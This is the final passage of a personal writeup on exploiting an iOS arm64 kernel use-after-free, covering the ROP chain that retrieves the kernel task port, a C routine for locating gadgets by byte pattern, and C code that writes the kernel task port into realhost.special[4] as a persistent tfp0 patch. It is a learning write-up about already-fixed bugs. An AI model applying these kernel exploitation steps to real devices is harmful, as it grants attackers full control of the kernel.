0xffffff80043f08cc      bf4301d1       sub sp, x29, 0x50
0xffffff80043f08d0      fd7b45a9       ldp x29, x30, [sp, 0x50] ; [0x50:4]=0x4dc000 ; 'P'
0xffffff80043f08d4      f44f44a9       ldp x20, x19, [sp, 0x40] ; [0x40:4]=0x4dc000 ; '@'
0xffffff80043f08d8      f65743a9       ldp x22, x21, [sp, 0x30] ; [0x30:4]=0 ; '0'
0xffffff80043f08dc      f85f42a9       ldp x24, x23, [sp, 0x20] ; [0x20:4]=25
0xffffff80043f08e0      fa6741a9       ldp x26, x25, [sp, 0x10] ; [0x10:4]=13
0xffffff80043f08e4      fc6fc6a8       ldp x28, x27, [sp], 0x60
0xffffff80043f08e8      c0035fd6       ret

This basically means return 0;.
That is actually quite bad though, because it means that all memory allocated by the function will be leaked (i.e. all objects created while parsing, plus objsArray and stackArray), and because it will ultimately cause the call to return failure. If my tool were ever to go into production, that should definitely be fixed, but since it’s technically working, it was good enough for my demo.

The core of our chain

The goal of our ROP chain is simple: get the kernel task port!
We can make a plan of how to do that by walking through the code of task_for_pid (vm_unix.c, l. 632) and just pretend we were already past the pid == 0 check, and that p->task = kernel_task. Skipping all checks, it basically comes down to:

/* Grant task port access */
task_reference(p->task);
extmod_statistics_incr_task_for_pid(p->task);

sright = (void *) convert_task_to_port(p->task);
tret = ipc_port_copyout_send(
        sright,
        get_task_ipcspace(current_task()));

/* ... */

copyout((char *) &tret, task_addr, sizeof(mach_port_name_t));

Let’s simplify that.

So given a userland address task_addr, this is what we want to run in kernel mode:

*task_addr = ipc_port_copyout_send(ipc_port_make_send(kernel_task->itk_self), current_task()->itk_space);

Now, I’m not dumping the ROP chain generation code into this writeup. If you wanna have a look at it, you’re gonna need to see all of it, so go have a look at rop.c. It’s not pretty, but I’ve thoroughly annotated it, so hopefully you’ll be able to understand it.
The general concept of this “inner” ROP chain is:

In practice it’s a bit more complicated than that. For example, calling a function is straightforward in a normal program, but in ROP that actually requires you to first run a gadget that loads values into some registers (commonly x19 and upwards), and then a gadget that does a blr to such a register.
But the above is sort of a high-level view. If you want details, go look at the source. It’s quite understandable, I promise! :P

The full implementation of this can be found in rop.c (building the chain) and uaf_rop.c (executing the chain).

Finding offsets/addresses

Whether we’re manually looking for addresses or want to write code that does it for us (after all, hardcoding is ugly), we need a plan on how to identify them.

~Note: I planned for an offset finder to be implemented in find.c, but I haven’t gotten round to it. I’m just outlining how the addresses could be found.~

Update 10. Jan 2017:

For arm64, this has been fully implemented in find.c now.

Now, there’s two categories:

ROP gadgets
Those are really straightforward: You have a fixed sequence of opcodes you need, so all you have to do is walk through __TEXT and __PRELINK_TEXT until you find a 1:1 match (on a 4-byte boundary, that is).
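As a rough illustration of that search (a sketch, not the code from find.c), the following walks a buffer in 4-byte steps and compares against a fixed byte sequence. The function name is made up; the example pattern is the byte encoding of the stack pivot gadget shown earlier, taken from the disassembly listing.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Returns the byte offset of the first 4-byte-aligned occurrence of `pat`
// within `seg`, or -1 if there is none.
static ptrdiff_t find_gadget(const uint8_t *seg, size_t seg_len, const uint8_t *pat, size_t pat_len)
{
    if(pat_len == 0 || pat_len > seg_len)
    {
        return -1;
    }
    for(size_t off = 0; off + pat_len <= seg_len; off += 4)
    {
        if(memcmp(seg + off, pat, pat_len) == 0)
        {
            return (ptrdiff_t)off;
        }
    }
    return -1;
}

// Bytes of the stack pivot gadget as they appear in memory.
static const uint8_t stack_pivot[] =
{
    0x3d, 0x79, 0xc1, 0xa8,  // ldp x29, x30, [x9], 0x10
    0xff, 0x43, 0x00, 0x91,  // add sp, sp, 0x10
    0xc0, 0x03, 0x5f, 0xd6,  // ret
};
```

The returned offset still has to be added to the segment's (slid) base address to get something usable in a chain.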

The rest
Data addresses, data structure offsets and most functions are more complicated; we need something that uniquely identifies them.
The usual approach to this is to start at the address of something that is uniquely identifiable (such as a string or a very rare sequence of opcodes) and then find references to or from that address or adjacent locations. I’ll briefly discuss everything that is not a ROP gadget (in my code, everything that doesn’t have registers in its name):

Part Four: Patching the kernel

The patch we’re gonna apply is as follows:

realhost.special[4] = kernel_task->itk_self;

With access to the kernel task port, applying that patch is a simple matter of using vm_read and vm_write (omitted error handling):

addr_t *special = (addr_t*)offsets.slid.data_realhost_special;
vm_address_t kernel_task_addr,
             kernel_self_port_addr;
vm_size_t size;

// Get address of kernel task
size = sizeof(kernel_task_addr);
vm_read_overwrite(kernel_task, (vm_address_t)offsets.slid.data_kernel_task, sizeof(kernel_task_addr), (vm_address_t)&kernel_task_addr, &size);

// Get address of kernel task/self port
size = sizeof(kernel_self_port_addr);
vm_read_overwrite(kernel_task, kernel_task_addr + offsets.unslid.off_task_itk_self, sizeof(kernel_self_port_addr), (vm_address_t)&kernel_self_port_addr, &size);

// Write to realhost.special[4]
vm_write(kernel_task, (vm_address_t)(&special[4]), (vm_address_t)&kernel_self_port_addr, sizeof(kernel_self_port_addr));

This isn’t technically true to the name “tfp0”, but it allows any binary running as root to retrieve the kernel task port via

host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &kernel_task);

The full implementation of this can be found in the patch_host_special_port_4 function in exploit.c.

Conclusion

Holy. Shit.

That was awesome!
It was also a whole lot of work, and this writeup is by far the longest thing I’ve ever written.
Glad you stayed with me ‘till the end! :D

And phew, I’ve learned an insane amount of things while doing this. I had doubts whether I was even gonna make it to the end, but it turns out I did, and I’m glad about that.
If you’re trying to get into exploitation like me, I can only recommend doing a project like this. Grab some publicly disclosed vulnerabilities that have been fixed in the latest iOS but to which your device is still vulnerable, start playing around with them, and see what you can get out of it. No amount of reading could replace such an experience. :)

Now, I will definitely continue to poke around in iOS, and if you’re interested in reading about it, you can follow me on Twitter.
And as stated at the beginning, please feel free to reach out to me if you have any kind of comments or questions. :)

Anything left to say?

Code

The code I wrote for this project is open source and available on GitHub, licensed under MIT.
(I simply named it after the leaf on my avatar, clover.)

Credits & thanks

First and foremost I would like to thank @jndok (as well as all the people he credits and thanks) for his amazing writeup and the accompanying PoC. My work here is entirely based on yours.

Also thanks to: